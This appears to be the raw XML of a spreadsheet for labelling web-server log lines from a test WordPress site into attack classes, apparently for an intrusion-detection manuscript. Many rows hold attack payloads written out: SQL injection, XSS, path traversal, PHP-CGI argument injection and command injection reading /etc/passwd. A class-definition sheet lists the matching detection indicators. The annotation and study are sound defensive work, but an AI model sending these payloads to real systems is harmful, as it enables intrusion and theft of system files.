      </c>
      <c r="G79" s="3" t="inlineStr"/>
      <c r="H79" s="3" t="inlineStr"/>
    </row>
    <row r="80">
      <c r="A80" s="2" t="n">
        <v>79</v>
      </c>
      <c r="B80" s="2" t="inlineStr">
        <is>
          <t>srbh-098b9c2443ef7421</t>
        </is>
      </c>
      <c r="C80" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET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 HTTP/1.1" 404 53918 "http://test-site.com/blog/index.php/2020/03/29/distinctio-sequi-officiis-occaecati/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D80" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020/03'))+and+ROW(6565,3405)&gt;(select+count(*),concat(0x3a727a613a,(select+(elt(6565=6565,1))),0x3a6172743a,floor(rand(0)*2))x+from+(select+4040+union+select+3957+union+select+7673+union+select+6102)a+group+by+x)+and+(('OQaz'='OQaz/29/distinctio-sequi-officiis-occaecati</t>
        </is>
      </c>
      <c r="E80" s="2" t="inlineStr"/>
      <c r="F80" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G80" s="3" t="inlineStr"/>
      <c r="H80" s="3" t="inlineStr"/>
    </row>
    <row r="81">
      <c r="A81" s="2" t="n">
        <v>80</v>
      </c>
      <c r="B81" s="2" t="inlineStr">
        <is>
          <t>srbh-3867d4a93c0e2198</t>
        </is>
      </c>
      <c r="C81" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/plugins/user-registration/assets/css/my-account-layout.css?ver=1.8.2.1%27%3Bsleep+15%3B%27 HTTP/1.1" 200 3366 "http://test-site.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D81" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/plugins/user-registration/assets/css/my-account-layout.css</t>
        </is>
      </c>
      <c r="E81" s="2" t="inlineStr">
        <is>
          <t>ver=1.8.2.1';sleep 15;'</t>
        </is>
      </c>
      <c r="F81" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G81" s="3" t="inlineStr"/>
      <c r="H81" s="3" t="inlineStr"/>
    </row>
    <row r="82">
      <c r="A82" s="2" t="n">
        <v>81</v>
      </c>
      <c r="B82" s="2" t="inlineStr">
        <is>
          <t>srbh-bd0132fafb48e0a0</t>
        </is>
      </c>
      <c r="C82" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/wp-json/oembedNULL/1.0/embed?format=xml&amp;url=http%3A%2F%2Ftest-site.com%2Fblog%2Findex.php%2Fvitae-dolores-quidem-possimus-aut-voluptatibus%2F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      </is>
      </c>
      <c r="D82" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/wp-json/oembedNULL/1.0/embed</t>
        </is>
      </c>
      <c r="E82" s="2" t="inlineStr">
        <is>
          <t>format=xml&amp;url=http://test-site.com/blog/index.php/vitae-dolores-quidem-possimus-aut-voluptatibus/</t>
        </is>
      </c>
      <c r="F82" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G82" s="3" t="inlineStr"/>
      <c r="H82" s="3" t="inlineStr"/>
    </row>
    <row r="83">
      <c r="A83" s="2" t="n">
        <v>82</v>
      </c>
      <c r="B83" s="2" t="inlineStr">
        <is>
          <t>srbh-231956c67a457b5a</t>
        </is>
      </c>
      <c r="C83" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/?s=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E HTTP/1.1" 200 57305 "http://test-site.com/blog/index.php/search/guidance" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D83" s="2" t="inlineStr">
        <is>
          <t>/blog/</t>
        </is>
      </c>
      <c r="E83" s="2" t="inlineStr">
        <is>
          <t>s=&lt;img src=x onerror=alert(1);&gt;</t>
        </is>
      </c>
      <c r="F83" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G83" s="3" t="inlineStr"/>
      <c r="H83" s="3" t="inlineStr"/>
    </row>
    <row r="84">
      <c r="A84" s="2" t="n">
        <v>83</v>
      </c>
      <c r="B84" s="2" t="inlineStr">
        <is>
          <t>srbh-3bbe10ab4bf97fea</t>
        </is>
      </c>
      <c r="C84" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /dashicons.min.css/wp-includes/css/dashicons.min.css?ver=4.9.5 HTTP/1.1" 404 276 "http://test-site.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D84" s="2" t="inlineStr">
        <is>
          <t>/dashicons.min.css/wp-includes/css/dashicons.min.css</t>
        </is>
      </c>
      <c r="E84" s="2" t="inlineStr">
        <is>
          <t>ver=4.9.5</t>
        </is>
      </c>
      <c r="F84" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G84" s="3" t="inlineStr"/>
      <c r="H84" s="3" t="inlineStr"/>
    </row>
    <row r="85">
      <c r="A85" s="2" t="n">
        <v>84</v>
      </c>
      <c r="B85" s="2" t="inlineStr">
        <is>
          <t>srbh-894dd4c4f8eb0ff1</t>
        </is>
      </c>
      <c r="C85" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/index.php/2020/04/04/nihil-tenetur-et-ad-in-dolores/feed/ HTTP/1.1" 200 457 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE)"</t>
        </is>
      </c>
      <c r="D85" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020/04/04/nihil-tenetur-et-ad-in-dolores/feed/</t>
        </is>
      </c>
      <c r="E85" s="2" t="inlineStr"/>
      <c r="F85" s="2" t="inlineStr">
        <is>
          <t>Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE)</t>
        </is>
      </c>
      <c r="G85" s="3" t="inlineStr"/>
      <c r="H85" s="3" t="inlineStr"/>
    </row>
    <row r="86">
      <c r="A86" s="2" t="n">
        <v>85</v>
      </c>
      <c r="B86" s="2" t="inlineStr">
        <is>
          <t>srbh-58856dbfa1cfc34b</t>
        </is>
      </c>
      <c r="C86" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "POST /blog/wp-content/uploads/2020/04/b476e717-efec-3b0d-80e9-13c6400a7702-300x240.png?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 10960 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D86" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/uploads/2020/04/&lt;*&gt;-300x240.png</t>
        </is>
      </c>
      <c r="E86" s="2" t="inlineStr">
        <is>
          <t>-d allow_url_include=1 -d auto_prepend_file=php://input</t>
        </is>
      </c>
      <c r="F86" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G86" s="3" t="inlineStr"/>
      <c r="H86" s="3" t="inlineStr"/>
    </row>
    <row r="87">
      <c r="A87" s="2" t="n">
        <v>86</v>
      </c>
      <c r="B87" s="2" t="inlineStr">
        <is>
          <t>srbh-d73316c59c0f4779</t>
        </is>
      </c>
      <c r="C87" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/uploads/%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F HTTP/1.1" 404 276 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"</t>
        </is>
      </c>
      <c r="D87" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/uploads//../../../../../../../../../../../../../../../../</t>
        </is>
      </c>
      <c r="E87" s="2" t="inlineStr"/>
      <c r="F87" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/&lt;*&gt; Firefox/73.0</t>
        </is>
      </c>
      <c r="G87" s="3" t="inlineStr"/>
      <c r="H87" s="3" t="inlineStr"/>
    </row>
    <row r="88">
      <c r="A88" s="2" t="n">
        <v>87</v>
      </c>
      <c r="B88" s="2" t="inlineStr">
        <is>
          <t>srbh-3ec9bd7c35e9c785</t>
        </is>
      </c>
      <c r="C88" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-content/uploads/2020%27+or+0+in+%28select+sleep%2815%29+%29+--+/04/4b6aa405-8ac7-33d8-9366-43fcef53f97a-300x239.png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88" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/uploads/2020'+or+0+in+(select+sleep(15)+)+--+/04/&lt;*&gt;-300x239.png</t>
        </is>
      </c>
      <c r="E88" s="2" t="inlineStr"/>
      <c r="F88" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G88" s="3" t="inlineStr"/>
      <c r="H88" s="3" t="inlineStr"/>
    </row>
    <row r="89">
      <c r="A89" s="2" t="n">
        <v>88</v>
      </c>
      <c r="B89" s="2" t="inlineStr">
        <is>
          <t>srbh-1bb98d10fd188122</t>
        </is>
      </c>
      <c r="C89" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /https%253A%252F%252Fwww.google.com%252Fsearch%253Fq%253DOWASP%252520republic/index.php/my-account/edit-profile/%7B%7B%20data.uploadedToLink%20%7D%7D HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/my-account/edit-profile/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D89" s="2" t="inlineStr">
        <is>
          <t>/https://www.google.com/search?q=OWASP republic/index.php/my-account/edit-profile/{{ data.uploadedToLink }}</t>
        </is>
      </c>
      <c r="E89" s="2" t="inlineStr"/>
      <c r="F89" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G89" s="3" t="inlineStr"/>
      <c r="H89" s="3" t="inlineStr"/>
    </row>
    <row r="90">
      <c r="A90" s="2" t="n">
        <v>89</v>
      </c>
      <c r="B90" s="2" t="inlineStr">
        <is>
          <t>srbh-294ce7c4825abe56</t>
        </is>
      </c>
      <c r="C90" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "COPY /blog/index.php/2020/03/22/quidem-rerum-sit-doloribus-quia-eum/ HTTP/1.1" 200 67616 "http://test-site.com/blog/index.php/page/2/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D90" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020/03/22/quidem-rerum-sit-doloribus-quia-eum/</t>
        </is>
      </c>
      <c r="E90" s="2" t="inlineStr"/>
      <c r="F90" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G90" s="3" t="inlineStr"/>
      <c r="H90" s="3" t="inlineStr"/>
    </row>
    <row r="91">
      <c r="A91" s="2" t="n">
        <v>90</v>
      </c>
      <c r="B91" s="2" t="inlineStr">
        <is>
          <t>srbh-b352ca18099691a0</t>
        </is>
      </c>
      <c r="C91" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /caspsamp/ HTTP/1.1" 404 301 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"</t>
        </is>
      </c>
      <c r="D91" s="2" t="inlineStr">
        <is>
          <t>/caspsamp/</t>
        </is>
      </c>
      <c r="E91" s="2" t="inlineStr"/>
      <c r="F91" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)</t>
        </is>
      </c>
      <c r="G91" s="3" t="inlineStr"/>
      <c r="H91" s="3" t="inlineStr"/>
    </row>
    <row r="92">
      <c r="A92" s="2" t="n">
        <v>91</v>
      </c>
      <c r="B92" s="2" t="inlineStr">
        <is>
          <t>srbh-7e2cec7706055abd</t>
        </is>
      </c>
      <c r="C92" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "POST /blog/wp-content/uploads/2020/04/d2ac875b-15d8-3412-9205-17afbf0ba62d-1024x682.jpg?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 73292 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D92" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-content/uploads/2020/04/&lt;*&gt;-1024x682.jpg</t>
        </is>
      </c>
      <c r="E92" s="2" t="inlineStr">
        <is>
          <t>-d allow_url_include=1 -d auto_prepend_file=php://input</t>
        </is>
      </c>
      <c r="F92" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G92" s="3" t="inlineStr"/>
      <c r="H92" s="3" t="inlineStr"/>
    </row>
    <row r="93">
      <c r="A93" s="2" t="n">
        <v>92</v>
      </c>
      <c r="B93" s="2" t="inlineStr">
        <is>
          <t>srbh-3863328194053c99</t>
        </is>
      </c>
      <c r="C93" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/uploads/2020/04/c88a75c6-b439-3e82-99dd-0aca7c568b15.jpg HTTP/1.1" 404 276 "http://test-site.com/blog/index.php/sample-page/ut-aspernatur-est-dolores/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D93" s="2" t="inlineStr">
        <is>
          <t>/blog/\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\/uploads/2020/04/&lt;*&gt;.jpg</t>
        </is>
      </c>
      <c r="E93" s="2" t="inlineStr"/>
      <c r="F93" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G93" s="3" t="inlineStr"/>
      <c r="H93" s="3" t="inlineStr"/>
    </row>
    <row r="94">
      <c r="A94" s="2" t="n">
        <v>93</v>
      </c>
      <c r="B94" s="2" t="inlineStr">
        <is>
          <t>srbh-a431911b3d185c50</t>
        </is>
      </c>
      <c r="C94" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "TRACK /blog/index.php/2020/04/04/labore-pariatur-amet-quam/embed/ HTTP/1.1" 200 20220 "http://test-site.com/blog/index.php/wp-json/oembed/1.0/embed?format=xml&amp;url=http%3A%2F%2Ftest-site.com%2Fblog%2Findex.php%2F2020%2F04%2F04%2Flabore-pariatur-amet-quam%2F" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D94" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/2020/04/04/labore-pariatur-amet-quam/embed/</t>
        </is>
      </c>
      <c r="E94" s="2" t="inlineStr"/>
      <c r="F94" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G94" s="3" t="inlineStr"/>
      <c r="H94" s="3" t="inlineStr"/>
    </row>
    <row r="95">
      <c r="A95" s="2" t="n">
        <v>94</v>
      </c>
      <c r="B95" s="2" t="inlineStr">
        <is>
          <t>srbh-9d595cd2d11f9d1d</t>
        </is>
      </c>
      <c r="C95" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /wp-content/themes/portfolio-press/ HTTP/1.1" 404 301 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"</t>
        </is>
      </c>
      <c r="D95" s="2" t="inlineStr">
        <is>
          <t>/wp-content/themes/portfolio-press/</t>
        </is>
      </c>
      <c r="E95" s="2" t="inlineStr"/>
      <c r="F95" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)</t>
        </is>
      </c>
      <c r="G95" s="3" t="inlineStr"/>
      <c r="H95" s="3" t="inlineStr"/>
    </row>
    <row r="96">
      <c r="A96" s="2" t="n">
        <v>95</v>
      </c>
      <c r="B96" s="2" t="inlineStr">
        <is>
          <t>srbh-531b6c771957dc14</t>
        </is>
      </c>
      <c r="C96" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /blog/wp-includes/js/media-views.min.js?ver=%27%22%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E HTTP/1.1" 200 100282 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D96" s="2" t="inlineStr">
        <is>
          <t>/blog/wp-includes/js/media-views.min.js</t>
        </is>
      </c>
      <c r="E96" s="2" t="inlineStr">
        <is>
          <t>ver='"&lt;script&gt;alert(1);&lt;/script&gt;</t>
        </is>
      </c>
      <c r="F96" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G96" s="3" t="inlineStr"/>
      <c r="H96" s="3" t="inlineStr"/>
    </row>
    <row r="97">
      <c r="A97" s="2" t="n">
        <v>96</v>
      </c>
      <c r="B97" s="2" t="inlineStr">
        <is>
          <t>srbh-2b5217346464bc51</t>
        </is>
      </c>
      <c r="C97" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/wp-content/uploads/2020/04/7eb06ef2-3782-3e6a-bb62-c705e86b2eee.jpg HTTP/1.1" 404 276 "http://test-site.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D97" s="2" t="inlineStr">
        <is>
          <t>/\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\/wp-content/uploads/2020/04/&lt;*&gt;.jpg</t>
        </is>
      </c>
      <c r="E97" s="2" t="inlineStr"/>
      <c r="F97" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G97" s="3" t="inlineStr"/>
      <c r="H97" s="3" t="inlineStr"/>
    </row>
    <row r="98">
      <c r="A98" s="2" t="n">
        <v>97</v>
      </c>
      <c r="B98" s="2" t="inlineStr">
        <is>
          <t>srbh-63f5cbbeccdb282b</t>
        </is>
      </c>
      <c r="C98" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "GET /..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/wp-includes/wlwmanifest.xml HTTP/1.1" 404 276 "http://test-site.com/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D98" s="2" t="inlineStr">
        <is>
          <t>/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\/wp-includes/wlwmanifest.xml</t>
        </is>
      </c>
      <c r="E98" s="2" t="inlineStr"/>
      <c r="F98" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G98" s="3" t="inlineStr"/>
      <c r="H98" s="3" t="inlineStr"/>
    </row>
    <row r="99">
      <c r="A99" s="2" t="n">
        <v>98</v>
      </c>
      <c r="B99" s="2" t="inlineStr">
        <is>
          <t>srbh-e0eb061a9be84600</t>
        </is>
      </c>
      <c r="C99" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "PATCH /blog/index.php/tag/nobis-perspiciatis-optio/qog2ljxqxf HTTP/1.1" 404 58226 "http://test-site.com/blog/index.php/2020/04/04/nihil-tenetur-et-ad-in-dolores/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D99" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/tag/nobis-perspiciatis-optio/qog2ljxqxf</t>
        </is>
      </c>
      <c r="E99" s="2" t="inlineStr"/>
      <c r="F99" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G99" s="3" t="inlineStr"/>
      <c r="H99" s="3" t="inlineStr"/>
    </row>
    <row r="100">
      <c r="A100" s="2" t="n">
        <v>99</v>
      </c>
      <c r="B100" s="2" t="inlineStr">
        <is>
          <t>srbh-4deeccb1df5f34e2</t>
        </is>
      </c>
      <c r="C100" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "POST /blog/index.php/my-account/edit-profile/post.php/.git/index/ HTTP/1.1" 200 58074 "http://test-site.com/blog/index.php/my-account/edit-profile/post.php/.git/index/" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D100" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/my-account/edit-profile/post.php/.git/index/</t>
        </is>
      </c>
      <c r="E100" s="2" t="inlineStr"/>
      <c r="F100" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G100" s="3" t="inlineStr"/>
      <c r="H100" s="3" t="inlineStr"/>
    </row>
    <row r="101">
      <c r="A101" s="2" t="n">
        <v>100</v>
      </c>
      <c r="B101" s="2" t="inlineStr">
        <is>
          <t>srbh-2c935f1abfdacad0</t>
        </is>
      </c>
      <c r="C101" s="2" t="inlineStr">
        <is>
          <t>172.26.0.1 - - [01/Jan/2020:00:00:00 +0000] "POST /blog/index.php/my-account/edit-profile/post.php/?action=edit&amp;post=%7B%7B+data.id+%7D%7D%22%26cat+%2Fetc%2Fpasswd%26%22 HTTP/1.1" 200 58137 "http://test-site.com/blog/index.php/my-account/edit-profile/post.php/?action=edit&amp;post=%7B%7B%20data.id%20%7D%7D" "Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0"</t>
        </is>
      </c>
      <c r="D101" s="2" t="inlineStr">
        <is>
          <t>/blog/index.php/my-account/edit-profile/post.php/</t>
        </is>
      </c>
      <c r="E101" s="2" t="inlineStr">
        <is>
          <t>action=edit&amp;post={{ data.id }}"&amp;cat /etc/passwd&amp;"</t>
        </is>
      </c>
      <c r="F101" s="2" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/&lt;*&gt; Firefox/70.0</t>
        </is>
      </c>
      <c r="G101" s="3" t="inlineStr"/>
      <c r="H101" s="3" t="inlineStr"/>
    </row>
  </sheetData>
  <dataValidations count="1">
    <dataValidation sqref="G2:G101" showDropDown="0" showInputMessage="0" showErrorMessage="1" allowBlank="1" errorTitle="Nilai tidak sah" error="Pilih salah satu nilai dari daftar." type="list">
      <formula1>"SQLI,XSS,PATH_TRAVERSAL,CMD_INJECTION,WEB_SCANNING,NORMAL"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50" customWidth="1" min="3" max="3"/>
    <col width="80" customWidth="1" min="4" max="4"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="2" t="inlineStr">
        <is>
          <t>FASE A — LABEL KELAS</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="2" t="inlineStr"/>
    </row>
    <row r="3">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Definisi kelas (Tabel 1 manuskrip)</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Class</t>
        </is>
      </c>
      <c r="B4" s="2" t="inlineStr">
        <is>
          <t>Code</t>
        </is>
      </c>
      <c r="C4" s="2" t="inlineStr">
        <is>
          <t>Definition</t>
        </is>
      </c>
      <c r="D4" s="2" t="inlineStr">
        <is>
          <t>Indicators in request, user agent, or referer</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="inlineStr">
        <is>
          <t>SQL injection</t>
        </is>
      </c>
      <c r="B5" s="2" t="inlineStr">
        <is>
          <t>SQLI</t>
        </is>
      </c>
      <c r="C5" s="2" t="inlineStr">
        <is>
          <t>SQL syntax injected into a parameter to manipulate a database query</t>
        </is>
      </c>
      <c r="D5" s="2" t="inlineStr">
        <is>
          <t>' OR 1=1, UNION SELECT, SLEEP(, comments -- or #, often URL-encoded (%27, %20)</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Cross-site scripting</t>
        </is>
      </c>
      <c r="B6" s="2" t="inlineStr">
        <is>
          <t>XSS</t>
        </is>
      </c>
      <c r="C6" s="2" t="inlineStr">
        <is>
          <t>Client-side script injected for execution in the victim's browser</t>
        </is>
      </c>
      <c r="D6" s="2" t="inlineStr">
        <is>
          <t>&lt;script&gt;, onerror=, javascript:, encoded variants (%3Cscript%3E), may appear in the referer</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t>Path traversal / file inclusion</t>
        </is>
      </c>
      <c r="B7" s="2" t="inlineStr">
        <is>
          <t>PATH_TRAVERSAL</t>
        </is>
      </c>
      <c r="C7" s="2" t="inlineStr">
        <is>
          <t>Access to files outside the web root, or local/remote file inclusion</t>
        </is>
      </c>
      <c r="D7" s="2" t="inlineStr">
        <is>
          <t>../, ..%2f, /etc/passwd, win.ini, external URLs with a scheme (http://...) in a path or parameter (RFI)</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="inlineStr">
        <is>
          <t>Command injection</t>
        </is>
      </c>
      <c r="B8" s="2" t="inlineStr">
        <is>
          <t>CMD_INJECTION</t>
        </is>
      </c>
      <c r="C8" s="2" t="inlineStr">
        <is>
          <t>OS commands injected through a parameter</t>
        </is>
      </c>
      <c r="D8" s="2" t="inlineStr">
        <is>
          <t>Command separators (;, &amp;&amp;, |) followed by shell commands such as id, cat /etc/passwd, sleep 15; backtick or $(...) substitution; encoded variants (%7C, %26%26, %60); Shellshock; PHP-CGI -d allow_url_include</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t>Web scanning / enumeration</t>
        </is>
      </c>
      <c r="B9" s="2" t="inlineStr">
        <is>
          <t>WEB_SCANNING</t>
        </is>
      </c>
      <c r="C9" s="2" t="inlineStr">
        <is>
          <t>Automated probing for files, directories, or server capabilities</t>
        </is>
      </c>
      <c r="D9" s="2" t="inlineStr">
        <is>
          <t>Scanner user agents (Nmap, zgrab, sqlmap), non-standard methods (PROPFIND, MKCOL, TRACK), backup/VCS files (.bak, .swp, .git/), probes for /.env, /wp-login.php</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>Normal</t>
        </is>
      </c>
